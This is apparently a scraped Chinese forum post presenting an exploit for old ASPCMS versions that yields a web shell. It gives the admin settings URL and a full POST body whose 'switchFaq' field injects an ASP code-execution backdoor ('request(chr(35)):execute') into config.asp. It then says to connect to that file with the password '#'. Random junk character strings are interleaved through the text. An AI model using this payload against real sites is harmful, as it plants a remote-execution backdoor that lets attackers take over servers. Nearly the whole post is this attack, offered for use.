老的ASPCMS版本的秒杀拿SHELL漏洞% a: I. Q9 H5 n
* q! q1 ~* l/ \7 D/ f& q 找到后台。。。然后! r7 n) s* W' q
/ M) E/ J, y0 S4 {8 E; m0 g2 B" ]/admin/_system/AspCms_SiteSetting.asp?action=saves) U- L; S: T- Z, A$ ?8 ~9 j6 h0 F, v
. {! R. a& K5 m) _. N直接POST
& j# C/ w4 [6 n W5 } N
6 T3 }7 i# L/ b/ grunMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=1
- i6 I$ T+ {# C$ u. ?& X: t# g
0 }$ T1 |9 T& m再连接配置文件config.asp 密码为#' \: ^6 Z5 M- ^8 L0 N
|